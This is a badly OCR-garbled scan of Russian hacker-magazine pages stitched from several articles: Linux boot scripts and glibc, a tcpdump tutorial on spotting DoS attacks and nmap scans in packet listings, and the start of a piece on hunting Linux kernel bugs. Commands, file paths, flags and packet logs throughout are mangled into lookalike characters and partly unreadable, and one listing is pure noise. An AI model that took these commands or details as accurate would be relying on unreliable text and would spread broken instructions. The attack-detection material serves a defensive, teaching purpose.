А теперь посмотрим, как все это выглядит в стартовых скриптах. Если су- 
дить по файлу /е1о/іпі11аЬ из ЕРЗ, то для начальной инициализации необхо- 
димо запустить скрипт /еіс/гс.сі/іпіі.сі/гс с параметром зузіпіі 
{зі::вузіпП:/еІс/гс.сІ/іпі1.сІ/гс вузіпП). Этот скрипт, в свою очередь, переходит в 
катапог /еіс/гс.сі/гсзувіпіі.сі и запускает скрипты (которые на самом деле яв- 
ляются ссылками) в этом каталоге. Их запуск будет происходить в следую- 
щем порядке (он может не совпадать с порядком, предложенным мной): 
ЗООтоипІкегпІз — монтирование ядерных ФС. Получив параметр зіагі, 
скрипт проверяет, не смонтирован ли /ргос и, в случае отрицательного отве- 
та, подключает ее командой "тоипі -п /ргос". Затем скрипт выясняет, под- 
держивает ли ядро файловую систему /зуз и монтирует ее {тоипі -п/вув). 
ЗОбтосІиІез — загрузка модулей. О том, поддерживает ли ядро модули, 
скрипт узнает по наличию файлов /ргос/кзутз и /рюс/тосіиіев. Далее сле- 
дует чтение файла /еіс/вузсопіід/тосіиіев, в котором прописаны имена мо- 
дулей и аргументы. К каждому из модулей применяется команда тосІргоЬе. 
ЗІОиЦеѵ — инициализация исіеѵ. Проверяется факт монтирования /вуз и на- 
личие файла /зЬ/п/ис/еи. Затем создается несколько полезных записей в ката- 
логе /Цеѵ (например, "Іп -з /ргос/зе11/М /Цеѵ/М"). После проверки, не активиро- 
вана ли уже исіеѵ, происходит монтирование виртуальной ФС к каталогу /гіеѵ 
(тоипі -п -1 гатіз гатіз /Цеѵ). Это нужно для того, чтобы записи в каталоге соз- 
давались не на физическом диске, а в оперативной памяти. С помощью ко- 
манды "есЦо /зЫп/игіеѵзепЦ > /ргос/зуз/кегпеІ/1ю1рІид" ядру сообщается о том, 
что если к компу было подключено новое устройство, то об этом должно быть 
немедленно известно системе исіеѵ, чтобы та могла создать новый файл для 
этого устройства. Все, теперь можно запустить исіеѵ командой игіеѵзіагі. 
320зѵѵар — подключение зѵѵар. Здесь все предельно просто: одна команда 
"зѵѵароп -а", которая монтирует все имеющиеся зѵѵар-разделы. 

ЗЗОсІіескІз — проверка файловых систем. Проверка любой файловой сис- 
темы осуществляется командой Ізск, которая, в зависимости от типа ФС, 
запускает другую программу проверки о именем 1зск.тип_фс (например, 
1зск.ех12 или Ізск.геізегіз). Такие утилиты обычно распространяются в паке- 
тах ех12ргодз, геізегізргодз и им подобных. Теперь разберем, как выполня- 
ет проверку скрипт сііескіз. Все начинается с подтверждения существова- 
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примерно так выглядит дерево ЗузІетѴ-скриптов 
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СТАНДАРТНАЯ 
БИБЛИОТЕКА ЯЗЫКА С 



о том, что «иЫІХ и С друзья на веки» знает каждый 
юниксоид. Поэтому можно предположить, что и ядро, и 
программное окружение написаны именно на С. Но сам язык 
не представляет никаких встроенных средств для вывода на 
экран, работы с файлами, памятью и другими ресурсами. Все 
эти действия должна выполнять внешняя библиотека. Такая 
библиотека присутствует в любом ІІМІХ и называется ЫЬС 
(сейчас используется ее ОМІІ-версия — дІіЬс). С ней 
слинкована каждая программа, можно в этом легко убедиться, 
натравив ІбсІ на любой бинарник в каталоге /Ь/п или/оэг/Р/л. 

Ты увидишь заветную строку "ІІЬс.зо.6 => /ІІЬ/ІІЬс.зо.б 
(0хЬ7еЬ2000)". Сама библиотека лежит в каталоге /ІІЬ и 
называется ІіЬс.во.б (цифра 6 означает, что она совместима с 
шестым релизом оригинальной ІІЬс). Чтобы уменьшить объем, 
занимаемый библиотекой в памяти, ее разбили на несколько 
частей и менее востребованные функции поместили в другие 
либы. Например: ІІЬт — математические функции, ІІЬсіІ — 
функции для загрузки библиотек на лету, ІІЬсгурІ — 
криптографические функции. Вместе с библиотекой 
поставляется динамический загрузчик (Іб-Ііпих.зо.2 для Ьіпих). 
При запуске программы он помещается в память первым и 
загружает все необходимые программе библиотеки, наличие 
которых определяет по файлу /е?с/И.зо.сасЛе. Этот файл, в 
свою очередь, создается утилитой Ібсопіід, читающей конфиг 
/еІс/Ш.зо.сопі. Кстати, такие популярные инструменты, как ІсІсІ, 
ісопѵ и Іосаіе, тоже являются частью пакета дІіЬс. 
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мастер настройки сервера. 


□НСР-сервер пока еще не установлен 






Ты можешь дать указание 
ядру запустить вместо іпН 
любой другой процесс, 
просто указав параметр 
іпіІ=/путь/до/программы. 
Например, Іпі1=/Ып/Ьавб. 




Именно из-за того, что в 
ипих-дистрибугивы, помимо 
ядра, входит множество 
различного свободно софта 
под лицензией вРІ, ііпцх 
следует называть вшипих. 



ния файла /ІавІЬооІ (в некоторых дистрибутивах он может иметь имя 
/еіс/іавіЬооі). Наличие такого файла означает, что проверку осуществлять 
не нужно, поэтому скрипт, увидев его, немедленно завершается. Далее 
скрипт перемонтирует корневую ФС в режим геаб-опіу (тоипі -п -о 
гетоип(,го /) для того, чтобы обеспечить возможность ее проверки. Чтобы 
узнать, не нужно ли производить принудительную проверку всех ФС, даже 
если они были корректно размонтированы, скрипт ищет файл /іогсеТзск (в 
некоторых р,\лстрах/еІс/іогсеІвск). В случае, если такого файла не было най- 
дено, выполняется команда "(зек -а -А -С -Т", проверяющая все файловые 
системы, прописанные в /еІс/ТвІаЬ. 

340тоипНз — монтирование файловых систем. После того, как завер- 
шилась проверка, можно смонтировать корневую ФС обратно в режим 
чтения/записи, что скрипт и делает, используя команду "гпоипі -п -о 
гетоипі,™ /". Далее происходит удаление уже ненужных файлов /(азі- 
Ьооі и /іогсеівск. Создается чистый файл /еІс/тІаЬ и в него, посред- 
ством команд "гпоипі -? /", "гпоипі -? /ргос" и "тоипі -? /зуз” записывается 
информация об уже смонтированных файловых системах (/, /ргос и 
/зуз). Это нужно для правильной работы некоторых программ. Наконец, 
командой "тоипі -а -О по_пе1сІеѵ" происходит монтирование файловых 
систем, подлежащих монтированию. Обрати внимание на последнюю 
опцию: она указывает тоипі не подключать сетевые ФС, потому что 
сеть еще не функционирует. 

ЗбОсІеапІз — очистка каталогов. В данном случае происходит зачистка 
/Ітр, /ѵаг/Іоск и /ѵаг/гип. Создается пустой файл /ѵаг/гип/иітр, а затем фай- 
лы, перечисленные в конфте /еІс/вувсопТід/сгеаІеНІев. 

860зѳ(сІоск — установка системного времени. Читается файл "/еіс/вувсоп- 
Тід/сіоск", и, если переменная "$иТС" имеет значение "Ігие" (значит, что 
СМОЗ-часы работают в часовом поясе Гринвича), то выполняется команда 
"Ітѵѵсіоск -Ітсіозуз -иіс", иначе команда "1т\л/с1оск -Исіозуз -ІосаІІІте". 
370сопзо1е — установка нужного шрифта и раскладки. Все необходимое для этой 
операции обычно находится в пакете кЬб. Шрифт устанавливается командой "зеі- 
Іопі имя_шрифта", а настройка раскладки командой "Іоабкеуз раскладка". Дос- 
тупные шрифты и раскладки можно найти в каталогах Уивг/вНагеТкЬсІ/сопвоІеІопІв" 
и "/ивг/вІтаге/кЬсІ/кеутарв" . Также для корректного отображения псевдографики 
может понадобиться загрузить «символьную карту» (сопзоіеігапз). 



ЗвОІосаІпеІ — интерфейс обратной петли предназначен для локального ис- 
пользования сетевых служб. Для его активизации скрипт выполняет всего 
одну команду "іісопіід Іо 127.0.0.1". 



На этом начальная инициализация заканчивается. Демон іпіі, прочитав 
строку "І3:3:\д/аі1:/е1с/гс.сі/іпі1.сі/гс 3" в /еІс/іпіііаЬ, повинуется и выполняет 
данную команду. Сщллт /еіс/тс.б/іпН.б/гс переходит в каталог /еІс/гс.о/гсЗ.с/, 
и процесс инициализации продолжается. Поднимается сеть, запускается 
зузіод, стоп, аі и другие демоны. 

По окончании этапа инициализации, іпіі читает последние строки 
/еІс/іпіНаЬ — "1 :2345:гезраѵѵп:/зЬіп/адеІІу -I '\033(К' Нуі 9600". Это озна- 
чает запуск адеііу на первом терминале (Нуі). Задача адеііу — подклю- 
читься к требуемому терминалу и запустить программу /Ып/Іодіп, кото- 
рая выводит на экран приглашение (файл /еіс/іввие) и ждет ввода име- 
ни и пароля. Утилита Іодіп сверяет имя и пароль с базой /еІс/вТіасІот и 
запускает шелл, прописанный в последней колонке файла /еіе/раввшеі 
для данного пользователя @ 
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Анализируем 
сетевую кровь 

СЕТЬ НАПОМИНАЕТ КРОВЕНОСНУЮ СИСТЕМУ, 
А ДВИЖУЩИЕСЯ ПО НЕЙ ПАКЕТЫ СРОДНИ 
ТРОМБОЦИТАМ, ЛЕЙКОЦИТАМ И ПРОЧИМ 
КЛЕТКАМ КРОВИ. ОДНАКО НЕ ВСЕ, ЧТО ПЛАВА- 
ЕТ В КРОВИ, НЕСЕТ ПОЛЬЗУ. ПЕРИОДИЧЕСКИ 
В КРОВЬ ПРОНИКАЕТ ЗАРАЗА, КОТОРАЯ СТРЕ- 
МИТСЯ НАВРЕДИТЬ ИЛИ ДАЖЕ УБИТЬ ВЕСЬ 
ОРГАНИЗМ. ЧТОБЫ ОБНАРУЖИТЬ И ВОВРЕМЯ 
УСТРАНИТЬ ЗАБОЛЕВАНИЕ, НЕОБХОДИМО 
СДАВАТЬ КРОВЬ НА АНАЛИЗЫ. С АНАЛОГИЧ- 
НОЙ ЦЕЛЬЮ СЛЕДУЕТ АНАЛИЗИРОВАТЬ «СЕТЕ- 
ВУЮ КРОВЬ». СТАНДАРТНЫМ ИНСТРУМЕНТОМ 
ДЛЯ ТАКОГО АНАЛИЗА В *М1Х ЯВЛЯЕТСЯ УТИ- 
ЛИТА ТСРОЦМР I Иван Скляров {ѵѵѵт.зкіуаго^.ги) 

Процесс загрузки Ціпих 
в подробностях 



[виртуозное владение опциями команд- 
ной строки] Утилита (срсіитр представляет 
собой сетевой анализатор пакетов, разработан- 
ный Ьаѵѵгепсе Вегкеіеу Маііопаі ЬаЬогаІогу. Если 
{срсіитр запустить без каких-либо параметров, 



она будет перехватывать все сетевые пакеты и выводить о них инс|торма- 
цию. С помощью параметра -і можно указать сетевой интерс(]ейс, о кото- 
рого следует принимать данные: 

# {срсіитр -і е{1і2 

Таким образом, о интерс()ейса е{{і2 будет осуществляться захват пакетов. 
Если требуются лишь пакеты, получаемые или отправляемые от опреде- 
ленного хоста, то его имя или ІР нужно указать после ключевого слова ІтозІ: 

# {србитр {юз{ патезгѵ 

Если же нужны пакеты, которыми обмениваются, например, хосты патез- 
ГѴІ и патезгѵ2, то можно использовать такой с})ильтр: 

# {србитр 1тоз{ патезгѵі апб патезгѵ2 

Для отслеживания только исходящих пакетов от какого-либо узла нужно 
указать сочетание "зго ІтозІ": 

# {србитр зго ІтозІ патезгѵ 

А для отслеживания только входящих пакетов — "с1з{ Ііоз{": 

# {србитр бз{ {юз{ патезгѵ 

Ключевые олова "зге роіі" и "с1з{ роіі" позволяют указывать порт отправите- 
ля и порт получателя, например: 

# {ербитр бз{ рог{ 513 

Если нужно отслеживать один из трех протоколов {ср, ибр, Іотр, то его имя 
можно просто указать в командной строке. С помощью булевых операто- 
ров апб (&&), ог (II) и по{ (!) можно задавать с})ильтры произвольной слож- 
ности. Ниже приведен пример с(зильтра, отслеживающего только ІСМР-па- 
кеты, приходящие из внешней сети: 




# (срсіитр іотр апй поі зге пе{ Іосаіпеі 

Можно проверять конкретные биты или байты в заголовках протоколов, 
для чего используется такой формат: рго1о[ехрг:зІ2е], где ргоіо — один из 
протоколов еіітег, Мбі, (г, ір, агр, гагр, іер, ибр, істр или ірб; ехрг — смеще- 
ние в байтах от начала заголовка пакета; зі/е — дополнительное поле, ука- 
зывающее, сколько байт рассматривать (может отсутствовать, тогда рас- 
сматривается 1 байт). Например, чтобы отбирать только ТСР-сегменты, в 
которых установлен флаг ЗѴМ, следует использовать фильтр: 

# (ербигпр '1ср[ 13 ]==2' 

Здесь нужно знать, что о 13 байта заголовка ТСР расположены 8 бит фла- 
гов (1 байт), где ЗѴМ является вторым битом по номеру. Так как он должен 
быть установлен в 1 , то байт флагов в двоичном виде будет выглядеть как 
00000010 (это 2 в бес). С помощью аргумента -о можно указать количество 
принимаемых пакетов: 

# (ербигпр -о 10 

В итоге будет получено всего 10 пакетов. Параметр -а позволяет (если воз- 
можно) отображать ІР-адреса в символьном виде (правда это довольно 
сильно замедляет работу утилиты): 

# іербигпр -а 

С помощью флага -ѵѵѵ можно получить максимально подробный вывод. 
Меньшую информацию выдают флаги: -ѵ и -ѵѵ. Обо всех возможных опци- 
ях можно узнать на страницах справочного руководства 1србитр(8). 

[формат выходной информации Ісрсіишр] В начале каждой строки 
листинга Іербигпр ставится отметка времени, которая является текущим 
временем часов в формате: б1і:тт:зз.1гас, где Ігас — это доли секунд. За от- 
меткой времени может указываться интерфейс, на который происходит при- 
ем пакетов, например, еІІтО, еібі, Іо и т. п. Запись е(1т0< означает, что идет 
прием пакетов на интерфейс еІИО. Соответственно, запись е1И0> означает. 



что идет отправка пакетов в сеть с интерфейса еІИО. Дальнейшие сведения 
зависят от типа принимаемого пакета (АНР/РАНР, ТСР, СОР, NВР, АТР). Да- 
лее показаны форматы для некоторых основных типов пакетов. 

О] ТСР-пакеты 

згс.рогі > бзІ.рогТ: Надз баіа-зедпо аск \д/іпбо\л/ игдепі орііопз 

зго.рогі и бзі.рогі — это ІР-адрес и порт источника и приемника пакетов, 
ііадз — это флаги, установленные в заголовке ТСР-пакета. Могут прини- 
мать комбинации из символов 3 (ЗУМ), Р (РІМ), Р (РУЗРІ), Р1 (РЗТ), также в 
этом поле может стоять одна точка, которая означает отсутствие установ- 
ленных флагов. 

баіа-зедпо — описывает данные, содержащиеся в пакете в таком формате: 
(іг5І:Іаз1(пЬу1ез), где (ігзі и Іазі — номер последовательности первого и пос- 
леднего байта пакета, пЬуІез — количество байт данных. Если параметр 
пЬуІез равен нулю, то Іігзі и Іазі совпадают, 
аск — следующий номер последовательности (ІЗМ + 1). 

\л/іпбо\л/ — размер окна. 

игдепі — указывает на наличие срочных данных в пакете (флаг ДРЮ), 
орііопз — здесь могут указываться дополнительные сведения, например 
<тзз 1024> (максимальный размер сегмента). 

[2] ІЮР-пакеты 

згс.рогі > бзі.рогі: ибр пЬуІез 

цбр — метка, указывающая на то, что идет анализ ДОР-пакетов. 
пЬуІез — число байт данных, содержащих ДОР-пакет. 

[Ц іеМР-пакеты 

зго > бзі: істр: Іуре 

істр — метка, идентифицирующая ІСМР-пакет. 

Іуре — тип іеМР-сообщения, например, есіто гедиезі или есіто геріу. 
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[хакер 08 [80] 05 > ЫМІХОЮ 104 ] 




рис.1 Оо8-атака ЗУМ РІоосІ 




рис.2 распределенная ОоЗ-атака ІСМР Ноосііпд 





[учимся распознавать атаку в листингах Ісрсіитр] Некоторые 
системы обнаружения атак (N108) используют журналы протоколирования, 
созданные утилитой Ісрсіитр, но мы сейчас научимся самостоятельно оп- 
ределять основные типы атак в листингах Ісрсіитр. 

На рисунке 1 показан листинг Ісрсіитр, в котором зас(зиксирована ОоЗ-ата- 



ка ЗУМ РІООСІ против узла 172.23.1 15.22. Об этом говорит множество ЗУМ- 
запросов на один порт (80/1ср) за очень короткий промежуток времени (де- 
сятки запросов за одно и то же время: 13:15:1 1 .580126). 

На рисунке 2 зас(зиксирована распределенная ОоЗ-атака (ООоЗ) ІСМР 
(Іообіпд (ІІооб ріпд). На первый взгляд можно подумать, что это обычный 
ріпд хоста, поскольку просто принимаются ІСМР-сообщения есііо гедиезі, а 
в ответ посылаются сообщения ІСМР есИо герІу.Слишком большое число 
запросов за столь короткий промежуток времени, к тому же все они прихо- 
дят с разных ІР-адресов. 

На рисунке 3 видно, что ІР-адреса, а также порт источника и приемника 
совпадают — это явный признак атаки ЬапсІ. Шторм ^апсI-запросов приво- 
дит к зацикливанию и может полностью вывести атакуемый узел из строя. 
Долгое время считалась, что эта атака вместе с устаревшими системами 
окончательно ушла в историю, однако багтраки всего мира не так давно со- 
общили, что обнаружена возможность осуществления ЬапсІ против систем 
ѴѴІпбоѵѵз Зегѵег 2003 и ѴѴІпсІо\л/з ХР ЗР2. Стоит отметить, что существует 
несколько модификаций этой атаки, например, ^а1іе^^а — когда посылают- 
ся пакеты на несколько портов одновременно. 

На рисунке 4 можно увидеть множество попыток установить ТСР-соедине- 
ние на различные порты узла 172.23.115.22. Большинство записей имеют 
следующий вид: 

12:00:17.899408 еІІтО < 192.168.10.35.2878 > 172.23.115.22.340: 3 
3477705342:3477705342 (0) \д/1п 64240 <тзз 1460,пор,пор,заскОК> (ОР) 
12:00:17.899408 еІІтО > 172.23.115.22.340 > 192.168.10.35.2878: Р 0:0 (0) 
аск 3477705343 \д/іп 0 (ОР) 

В первой строке передается ТСР ЗУМ-запрос, а во второй отсылаются в от- 
вет пакеты ТСР РІЗТ — это говорит о том, что подключение к данному пор- 
ту невозможно. В листинге также встречается такая цепочка записей: 

12:00:17.899408 еІІтО < 192.168.10.35.2879 > 172.23.1 15.22.ззИ: 3 
3477765723:3477765723 (0) ѵѵіп 64240 <т83 1 460,пор,пор,еаскОК> (ОР) 
12:00:17.899408 еІІтО > 1 72.23.1 15.22.ззИ > 192.168.10.35.2879: 3 
3567248280:3567248280 (0) аск 3477765724 ѵѵІп 5840 <тзз 
1460, пор, пор, заскОК> (ОР) 

12:00:17.899408 еІІтО < 192.168.10.35.2879 > 172.23.1 15.22.ззИ: . 1:1(0) аск 
1 ѴѴІП 64240 (ОР) 

12:00:17.899408 еІІтО < 192.168.10.35.2879 > 172.23.1 15.22.ззИ: Рі 
3477765724:3477765724(0) ѵѵіп 0 (ОР) 

Здесь аналогично: в первой строке передается ЗУМ-запрос на ззіт-порт 
(22Лср) узла 172.23.115.22. Затем в следующей строке показано, что узел 
172.23.115.22 посылает ответ с установленными флагами ЗУМ и АСК, при 
этом значение поля Аскпоѵѵіебдтепі МитЬег в ТСР заголовке увеличено на 
единицу (3477765723+1). В третьей строке узел 192.168.10.35 подтвержда- 
ет получение ответа. И в последней строчке соединение закрывается уз- 
лом 192.168.255.20 посылкой РІЗТ. Таким образом, трехэтапное рукопожа- 
тие ТСР (ТСР ібгее-ѵѵау ІіапсІзІіаке) не было корректно осуществлено. Ріа 
рисунке 4 зафиксировано ТСР-сканирование узла 172.23.1 15.22. 

С большой вероятностью можно предположить, что работает сканер птар 
(с установленным флагом -зТ), так как номера портов, на которые прихо- 
дят запросы, увеличиваются не последовательно на единицу, как в случае 
большинства других сканеров, а совершенно случайным образом (хотя так 
поступает не только один птар). 

Ріа рисунке 5 листинг похож на предыдущий. Ріа узел 172.20.100.100 посту- 
пают ЗУМ-запросы, и в случае закрытого порта в ответ отсылаются пакеты 
с флагом РІЗТ. Однако реакция на открытые порты отличается от предыду- 
щего листинга: 

12:44:17.899408 еІІтО < 192.168.99.200.2879 > 172.20.100.100. Мір: 3 
1045782751:1045782751 (0) ѵѵіп 4096 

12:00:17.899408 еІІтО > 1 72.20.1 00.1 ОО.ІіІІр > 192.168.99.200.2879: 3 
2341745720:2341745720 (0) аск 1045782752 ѵѵіп 5840 <тзз 1460> (ОР) 
12:00:17.899408 еіИО < 192.168.99.200.2879 > 172.20.100.100.1і11р: В 
1045782752:1045782752 (0) ѵѵіп 0 

Заметно, что в ответ на ЗУМ-запрос возвращается пакет с установленными 
флагами ЗУМ и АСК, после чего соединение обрывается посылкой флага ВЗТ. 
Значит, трехэтапное рукопожатие не было выполнено полностью — это говорит 
о том, что порты узла 172.20.100.100 сканируются методом незавершенного 
открытого сеанса (ІтаІІ-ореп зсаппіпд) или, как его еще называют, — скрытое 
(зіеаіііі) ТСР ЗУМ-сканирование (флаг -зЗ в сканере птар). 

В листинге на рисунке 6 на различные порты поступают ІЮР-дейтаграммы, 
содержащие 0 байт данных. Это явный признак того, что осуществляется 
ІШР-сканирование. Если порт закрыт, узел отсылает ІСМР-сообщение рогі 
ипгеасІтаЫе. Если такое сообщение не посылается, значит, порт открыт. 







Отмечу, что О байт данных при ООР-сканировании посылает сканер птар 
(с установленным флагом -зУ), другие сканеры могут посылать большее 
число байт данных. Например, Хзрігіег посылает 3 байта в каждом пакете. 
Если же в листинге будет множество запросов, в которых не установлено 
ни одного флага (стоит точка в поле Яадз), например: 

02:12:59.899408 еІбО < 10.15.100.6.41343 > 192.168.2.4.30310: . 
971654054:971654054(0) ѵѵіп 2048 

02:12:59.899408 еібО > 192.168.2.4.30310 > 10.15.100.6.41343: Р 0:0(0) аск 
971654054 \л/іп 0 (ОР) 

02:12:59.899408 еІІтО < 10.15.100.6.41343 > 192.168.2.4.275: . 
971654054:971654054(0) ѵѵіп 3072 

Что это ненормальное состояние, свидетельствует то, что выполняется 
МиІІ-оканирование (флаг -зМ в сканере птар). 

РІМ-сканирование (флаг -зР в птар) легко вычислить по множеству посту- 
пающих пакетов о установленным флагом РІМ: 

04:17:40.580653 еІбО < 192.168.10.35.46598 > 172.23.1 15.22.Пр: Р 

1918335677: 1918335677(0) ѵѵіп 2048 

04:17:40.580653 еІііО < 192.168.10.35.46599 > 1 72.23.1 15.22.Пр: Р 

1918337777: 1918337777(0) ѵѵіп 3072 

Сканирование по методу «рождественской елки» (ТСР Хтаз Тгее зсап, флаг 
зХ' в птар) определяется по множеству запросов с установленными флагами 
РІМ, УРЮ и РУЗН. Если порт закрыт, то в ответ посылается пакет с флагом РІЗТ : 

03:22:46.960653 еІітО < 192.168.10.35.55133 > 172.23.115.22.19150: РР 
1308848741:1308848741(0) ѵѵіп 2048 игд 0 

03:22:46.960653 еіііО > 172.23.115.22.19150 > 192.168.10.35.55133: Рі 0:0(0) 
аск 1308848741 ѵѵіп 0 (ОР) 

03:22:46.960653 еІііО < 192.168.10.35.55133 > 1 72.23.1 1 5.22.зт1р: РР 
1308848741:1308848741(0) ѵѵіп 3072 игд 0 

Также существует сканирование о помощью АСК-пакетов (флаг -зА в 
птар). Этот метод используется для определения правил, используемых 
брандмауэром. Ріа порты сканируемого узла отправляются пакеты с уста- 
новленным флагом АСК. Если в ответ приходят пакеты о флагом РІЗТ, то 
порты классифицируются как нефильтруемые (ипііііегеб) брандмауэры. Ес- 
ли никакого ответа не приходит, порт считается фильтруемым (Ііііегесі). Для 
подтверждения сканер делает запрос дважды, листинг Ісрсіитр будет выг- 
лядеть примерно так: 

13:44:46.361688 еіііО < 192.168.91.130.56528 > 172.18.10.23.30310: . 

1 1 1 4201 1 30:1 1 1 4201 1 30(0) аск 0 ѵѵіп 2048 

13:44:46.361688 еіііО > 172.18.10.23.30310 > 192.168.91.130.56528: 

Рі 0:0(0) ѵѵіп о (ОР) 

13:44:46.361688 еіііО < 192.168.91.130.56528 > 172.18.10.23.275: . 

1 1 1 4201 1 30:1 1 1 4201 1 30(0) аск 0 ѵѵіп 3072 

13:44:46.361688 еіііО >172.18.10.23.275 > 192.168.91.130.56528: Рі 0:0(0) ѵѵіп 0 (ОР) 
13:44:46.361688 еіІіО < 192.168.91.130.56528 > 172.18.10.23.ппір: . 

1 1 1 4201 1 30:1 1 1 4201 1 30(0) аск 0 ѵѵіп 2048 

Ріа рисунке 7 показана 8тиг1-атака. Хакер посылает широковещательный 
іСМР-запрос (есііо гедиезі) в сеть 172.23.115.0 от имени жертвы 
(192.168.10.1). Каждый компьютер сети (в листинге показан только узел 
172.23.115.1), получивший широковещательный запрос, генерирует ответ 
(есііо геріу) на адрес жертвы, вызывая «отказ в обслуживании». Периоди- 
ческое повторение запроса позволяет поддерживать проведение атаки 
против хоста 192.168.10.1. Утилита ісрсіитр после имени интерфейса (еіііО) 
предупреждает опцией В, что идет прием широковещательного запроса. 
Есть разновидность атаки Зтигі под названием Ргаддіе (осколочная грана- 
та), в которой используется УОР, а не ІСМР: 



іггООіІТ.ИЭіОѲ яеЬО > 
1Ы57В?7К -1Г. » ІрП 

1МЕГТд(?7И И4Г1 ^ 
37гМ|]7.е99і10Й ЯІУЙ <. 
Ш57977Т^( ІйЬ иІА 40% 

»іп -а 4ІГ) 
і^.йтемс еььо < 
СМЗТЙіЖі №> *1л 

йкНО > 
иіп а П1Г1 
і7;Ыі:і7.впи(« яг>й > 
(«г інин 

ігзш: 1.^.117540) нша 9 
імаКЁТ^ .ііп & і№] 
17:44^ 17.В9МС 4.^0 с 
п)| -и 50^ 
17:40 :і7,[і'99іон ягіѵСі ■> 
и;п й ІТГ1 



і9е,і№,99,г(»,.й9«г 
І7},Иі.да.І№.№Р. 
15К.. !Ы] .зий 

ІЙ.ЭІ.КИ.ІІУІ.ІЙГ 
99,744, 7Й№1 
І,тг,3й.і0а.!і)0.г№ 
і9Е.!БВ.Ѵ9.г«>39е& 

№.]и.'99.№1,аш 

іга.гй.іоо.іицай 



> іщ.і-йя,9е.да,яиэ 

) 19й.1Ьа.д9.ЯС.ЯЗБа 
;і і 77 .?о.іоо.кв,і'звя 

^ іга.М. 100. 190.^63 
7 197. .99,^00 
» ітг.га.ідо.ім.ііййс 
) Иг.ІЙІ.ТІ.ІОСІ.ЙІЬ 

> і,?5.й,}оодао,і?5і 



рис.5 скрытое (зіеаіііі) ТСР ЗѴМ сканирование 
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рис.6 УОР-оканирование 
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рис.7 атака Зтигі 



08:34:18.899408 еІііО В 192.168.10.22.34904 > 172.23.1 15.255.есііо: ибр 64 
08:34:18.899408 еІііО > 1 72.23. 115.255.есііо > 192.168.10.22.34904: ибр 64 
08:34:18.520602 еІИО В 192.168.10.22.34904 > 172.23.1 15.255.есііо: ибр 64 

Атакующий посылает поддельные УОР-пакеты на широковещательной ад- 
рес усиливающей сети (обычно на есііо-порт 7/ибр). Каждая система сети, 
в которой разрешен ответ на эхо-пакеты, возвратит пакеты системе-жерт- 
ве, в результате чего будет сгенерирован большой объем трафика. 

Иногда в поступающих пакетах могут быть установлены нестандартные со- 
четания флагов, например, взаимоисключающие флаги ЗР (ЗѴМч-РІМ), где 
ЗѴМ — устанавливает соединение, РІМ — завершает. Также могут быть 
указаны резервные флаги [ЕСМ-Есііо,СѴѴРІ] и идущие подряд флаги РІМ без 
предшествующих ЗѴМ, например: 



11:16:22:899931 еіітО < 192.168.10.35.2879 > 172.23.1 15.22.491 : ЗР 
3477765723:3477765723 (0) ѵѵіп 1024 

11:16:22:899931 еіИО < 192.168.10.35.2880 > 172.23.115.22.1351: 3 [ЕСМ- 
ЕсИо.СѴѴР!] 3477800253:3477800253 (0) ѵѵіп 4096 
11:16:22:899931 еіітО < 192.168.10.35.2881 > 172.23.115.22.2880: ЗРРІ 
3477835208:3477835208 (0) ѵѵіп 4096 

Такие запросы злоумышленник может использовать в двух целях. Во-первых, 
нестандартные комбинации флагов могут вывести узел из строя или способ- 
ствовать обходу систем обнаружения атак и межсетевых экранов. 
А во-вторых, нестандартные флаги используются для идентификации ОС уз- 
ла. Разные оси реагируют по-разному на пакеты несоответствующие стандар- 
там РІРС — эту возможность практикуют утилиты птар, диезо и прочее @ 



[хакер 08 [80] 05 > УМІХОЮ 105 ] 
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Штурм ядра Уіпих 

ЯДРО — это ФУНДАМЕНТ ВСЕЙ СИСТЕМЫ. 

НА ВАЖНОМ ЯДРЕ ХОРОШЕГО ЛИНУХА НЕ ПО- 
СТРОИШЬ. РАЗРАБОТЧИКИ НЕ ОТХОДЯТ ОТ 
КЛАВИАТУРЫ, ВЫЯВЛЯЯ ВСЕ НОВЫЕ И НОВЫЕ 
ОШИБКИ, НО БАГИ РАЗМНОЖАЮТСЯ БЫСТРЕЕ! 
ДАЛЕКО НЕ ВСЕ ОШИБКИ ОПАСНЫ, И ЛИШЬ 
НЕМНОГИЕ ИЗ НИХ ДОПУСКАЮТ УДАЛЕННОЕ 
ПРОНИКНОВЕНИЕ В СИСТЕМУ. НАЙТИ ТАКОЙ 
БАГ — БОЛЬШАЯ УДАЧА. КАК ХАКЕРЫ ИССЛЕ- 
ДУЮТ ЯДРО? КАКИЕ ИНСТРУМЕНТЫ ИСПОЛЬ- 
ЗУЮТ? ВОТ ОБ ЭТОМ МЫ СЕЙЧАС И ПОГОВО- 
РИМ I Крис Касперски ака мыщъх 

Секреты кернел хакинга 



[введение] Линуховое ядро — это довольно 
сложное инженерное сооружение, исходные тек- 
сты которого занимают свыше сотни мегабайт. 
Чего тут только нет! Драйвера, стек ТСР/ІР, мене- 
джер виртуальной памяти, планировщик потоков, 
загрузчик ЕЬР-файлов и многое другое. Все это 
хозяйство, откровенно говоря, просто кишит 
ошибками, над поиском которых работают десят- 
ки хакерских групп и тысячи независимых кодо- 
копателей по всему миру. Хочешь к ним приоб- 
щиться? Что за вопрос! Кто же этого не хочет! 
Правда, не у всех получается, особенно с перво- 
го раза, но лиха беда начало! 




Ме.і/.пеі 

шшш.Шарго.сот 

шшш.кегпеі.огд 

шшш.іІс-есШог.огд 

шшш.вкуігее.огд/Нпих/геіе- 

гепсев/Еік_когта1.рд{ 



[снаружи ядра] Существуют, по 
меньшей мере, две методики поис- 
ка багов, но обе они порочные и не- 
правильные. Одни хакеры предпо- 
читают просматривать исходные ко- 
ды ядра, анализируя строку за стро- 
кой, другие — дизассемблируют го- 
товое ядро. Вот неполный перечень недостатков первого способа: 

О] Вместо фактического значения переменной в Си сплошь и рядом ис- 
пользуются макросы, определяемые неизвестно где, причем макрос может 
переопределяться многократно или, что еще хуже, различные включаемые 
файлы содержат несколько независимых макросов о одинаковым именем, 
так что глобальный контекстный поиск, практикуемый многими исследова- 
телями, не помогает (можно, правда, прогнать исходный текст через пре- 
процессор "срр имя_файла.с", но от этого его объем, а, значит, и время 
анализа только возрастет). 

[Ц Ни одна известная мне ЮЕ не способна отображать перекрестные 
ссылки на функции/данные, трассировать поток управления и делать 
множество других полезных вещей, о которыми легко оправляется лю- 
бой приличный дизассемблер. 

[Ц В процессе компиляции могут «маскироваться» одни ошибки и добав- 
ляться другие, к тому же никогда нельзя сказать наперед, по каким адре- 
сам и в каком порядке компилятор расположит переменные и буферы в па- 
мяти, а для написания зИеІІ-кода — это критичный момент. 

С другой стороны дизассемблерный листинг ядра не просто велик. Он огро- 
